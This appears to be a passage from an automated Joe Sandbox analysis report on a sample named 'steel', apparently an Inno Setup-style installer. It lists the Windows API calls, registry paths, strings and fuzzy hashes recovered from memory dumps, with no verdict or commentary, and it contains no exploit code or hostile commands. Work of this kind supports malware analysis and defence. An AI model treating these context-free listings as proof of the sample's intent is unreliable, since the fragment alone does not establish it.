                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                                                            • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                                                            • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                                                            • GetDC.USER32(00000000), ref: 0041B402
                                                                                            • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                            • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                            • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                            • String ID:
                                                                                            • API String ID: 644427674-0
                                                                                            • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                            • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                                                            • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                            • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                                                            APIs
                                                                                              • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
                                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
                                                                                            • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
                                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                            • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                            • API String ID: 971782779-3668018701
                                                                                            • Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                            • Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
                                                                                            • Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                            • Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                                              • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                            • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                                                            • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                                                            • RegOpenKeyEx, xrefs: 00454910
                                                                                            • , xrefs: 004548FE
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue$FormatMessageOpen
                                                                                            • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                            • API String ID: 2812809588-1577016196
                                                                                            • Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                            • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                                                            • Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                            • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                                            APIs
                                                                                              • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                                                            Strings
                                                                                            • v1.1.4322, xrefs: 004595C2
                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                                                            • v2.0.50727, xrefs: 0045955B
                                                                                            • .NET Framework not found, xrefs: 0045961D
                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                                                            • v4.0.30319, xrefs: 004594F1
                                                                                            • .NET Framework version %s not found, xrefs: 00459609
                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$Open
                                                                                            • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                            • API String ID: 2976201327-446240816
                                                                                            • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                            • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                                                            • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                            • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                                                            • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                                                            • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                                                            • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                                                            • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                                                            Strings
                                                                                            • Helper isn't responding; killing it., xrefs: 00458A87
                                                                                            • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                                                            • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                                                            • Helper process exited, but failed to get exit code., xrefs: 00458AEF
                                                                                            • Helper process exited., xrefs: 00458AC5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                            • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                            • API String ID: 3355656108-1243109208
                                                                                            • Opcode ID: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                            • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                                                            • Opcode Fuzzy Hash: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                            • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
                                                                                            APIs
                                                                                              • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                                              • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                            Strings
                                                                                            • , xrefs: 004545B1
                                                                                            • RegCreateKeyEx, xrefs: 004545C3
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateFormatMessageQueryValue
                                                                                            • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                            • API String ID: 2481121983-1280779767
                                                                                            • Opcode ID: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                            • Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
                                                                                            • Opcode Fuzzy Hash: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                            • Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
                                                                                            APIs
                                                                                              • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                              • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
                                                                                            • CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
                                                                                            • SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
                                                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
                                                                                              • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                            • DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                            • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                            • API String ID: 1549857992-2312673372
                                                                                            • Opcode ID: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                            • Instruction ID: 18f462a79ff6f3765b6ab1b49dcd34ad23a8ddcce266b6658739bc0f5698dca4
                                                                                            • Opcode Fuzzy Hash: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                            • Instruction Fuzzy Hash: 61414C70A40208AFDF00EBA5DD42F9E7BB8EB08714F52457AF510F7291D7799E008B68
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressCloseHandleModuleProc
                                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                                                            • API String ID: 4190037839-2312295185
                                                                                            • Opcode ID: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                            • Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
                                                                                            • Opcode Fuzzy Hash: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                            • Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
                                                                                            APIs
                                                                                            • GetActiveWindow.USER32 ref: 004629FC
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
                                                                                            • GetWindowRect.USER32(?,00000000), ref: 00462A76
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                            • API String ID: 2610873146-3407710046
                                                                                            • Opcode ID: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                            • Instruction ID: 865a179037155f8fdabe2954c964c2dd38b7d55406d5d1e7c7801a7b23b437f8
                                                                                            • Opcode Fuzzy Hash: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                            • Instruction Fuzzy Hash: B7219575701B057BD610D6A88D85F3B36D8EB84715F094A2AF944DB3C1E6F8EC018B9A
                                                                                            APIs
                                                                                            • GetActiveWindow.USER32 ref: 0042F194
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                                                            • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                            • API String ID: 2610873146-3407710046
                                                                                            • Opcode ID: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                            • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                                                            • Opcode Fuzzy Hash: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                            • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                                                            APIs
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,02123858,00000000), ref: 00458C79
                                                                                            • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
                                                                                            • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
                                                                                            • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,00458D90,?,00000000), ref: 00458D55
                                                                                            • GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,00458D90,?,00000000), ref: 00458D5C
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                            • String ID: CreateEvent$TransactNamedPipe
                                                                                            • API String ID: 2182916169-3012584893
                                                                                            • Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                            • Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
                                                                                            • Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                            • Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
                                                                                            • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
                                                                                            • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                            • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                            • API String ID: 1914119943-2711329623
